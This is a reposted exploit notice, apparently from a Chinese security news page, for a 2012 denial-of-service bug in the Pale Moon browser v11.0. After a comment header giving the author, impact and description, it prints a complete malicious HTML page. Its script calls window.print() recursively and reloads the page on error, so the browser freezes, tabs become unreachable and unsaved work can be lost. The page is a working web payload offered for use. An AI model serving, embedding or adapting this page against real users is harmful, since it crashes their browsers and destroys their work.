|
Pale Moon Web Browser v11.0 (Multi Looping) DOS exploit
|
|
来源:www.eidelweiss.info 作者:eidelweiss 发布时间:2012-03-26
|
|
<!--
#Title: Pale Moon Web Browser v11.0 (Multi Looping) DOS exploit
#version: 11.0
#vendor: Moonchild Productions
#download application: http://www.palemoon.org/
#Author: eidelweiss (twitter @RandyArios)
#Contact: admin[at]eidelweiss[dot]info / ariosrandy[at]gmail[dot]com
#Homepage: www.eidelweiss.info
#Tested On: Windows 7 (x86)
#thank`s and Greetz to : devilzc0de, yogyacarderlink, and all hacker`s
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.
#Vulnerability Description
This bug is a typical result of multiple loop.
The flaw exists when the attacker put window.printer() funtion
in multiple loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
-->
<html>
<title>Pale Moon Multi Looping By eidelweiss</title>
<script>
function
eidelweiss()
{
window.onerror=new Function("history.go(0)");
window.print();
eidelweiss();
}
eidelweiss();
</script>
</html>
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
